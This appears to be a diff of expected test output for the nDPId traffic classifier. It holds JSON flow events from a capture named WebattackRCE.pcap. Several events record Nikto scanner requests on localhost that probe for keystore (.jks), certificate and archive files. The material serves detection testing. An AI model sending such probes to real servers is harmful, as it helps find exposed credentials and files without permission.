+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277058,"flow_last_seen":1576420277058,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277058,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50046,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277060,"flow_last_seen":1576420277060,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277060,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1576420277060,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277060,"pkt":"AAAAAAAAAAAAAAAACABFAADB8w9AAEAGSSV\/AAABfwAAAcOAH5AJpMt9MSZkIYAYAED+tQAAAQEICp1m\/GydZvxsR0VUIC8xMjcuMC5qa3MgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277060,"flow_last_seen":1576420277060,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277060,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50048,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277060,"flow_last_seen":1576420277060,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277060,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50048,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277061,"flow_last_seen":1576420277061,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277061,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1576420277061,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277061,"pkt":"AAAAAAAAAAAAAAAACABFAADDv8dAAEAGfGt\/AAABfwAAAcOCH5BIh4e15F5tqYAYAED+twAAAQEICp1m\/G2dZvxtR0VUIC8xMjcuMC4wLmprcyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277061,"flow_last_seen":1576420277061,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277061,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277061,"flow_last_seen":1576420277061,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277061,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277063,"flow_last_seen":1576420277063,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277063,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1576420277063,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277063,"pkt":"AAAAAAAAAAAAAAAACABFAADDTFBAAEAG7+J\/AAABfwAAAcOEH5DLhXRAbe\/JloAYAED+twAAAQEICp1m\/G+dZvxvR0VUIC8xMjcuMC4wLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277063,"flow_last_seen":1576420277063,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277063,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50052,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277063,"flow_last_seen":1576420277063,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277063,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50052,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277064,"flow_last_seen":1576420277064,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277064,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1576420277064,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277064,"pkt":"AAAAAAAAAAAAAAAACABFAADCx41AAEAGdKZ\/AAABfwAAAcOGH5Ab+v\/67hwkoIAYAED+tgAAAQEICp1m\/HCdZvxwR0VUIC8xMjcwMDEuamtzIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277064,"flow_last_seen":1576420277064,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277064,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50054,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277064,"flow_last_seen":1576420277064,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277064,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50054,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277066,"flow_last_seen":1576420277066,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277066,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1576420277066,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277066,"pkt":"AAAAAAAAAAAAAAAACABFAADC4+FAAEAGWFJ\/AAABfwAAAcOIH5A1wtuuFoHVMYAYAED+tgAAAQEICp1m\/HGdZvxxR0VUIC8xMjcwMDEuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277066,"flow_last_seen":1576420277066,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277066,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50056,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277066,"flow_last_seen":1576420277066,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277066,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50056,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277067,"flow_last_seen":1576420277067,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277067,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1576420277067,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277067,"pkt":"AAAAAAAAAAAAAAAACABFAADCfFhAAEAGv9t\/AAABfwAAAcOKH5CRgEQl8Paa6IAYAED+tgAAAQEICp1m\/HOdZvxzR0VUIC8wLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277067,"flow_last_seen":1576420277067,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277067,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50058,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277067,"flow_last_seen":1576420277067,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277067,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50058,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277070,"flow_last_seen":1576420277070,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277070,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":1576420277070,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277070,"pkt":"AAAAAAAAAAAAAAAACABFAADCXGdAAEAG38x\/AAABfwAAAcOMH5AiiWQXZDyqFoAYAED+tgAAAQEICp1m\/HadZvx1R0VUIC8wLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277070,"flow_last_seen":1576420277070,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277070,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50060,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277070,"flow_last_seen":1576420277070,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277070,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50060,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277072,"flow_last_seen":1576420277072,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277072,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":1576420277072,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277072,"pkt":"AAAAAAAAAAAAAAAACABFAADDQNZAAEAG+1x\/AAABfwAAAcOOH5A+53ionbjt1YAYAED+twAAAQEICp1m\/HedZvx3R0VUIC8xMjcuMC4wLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 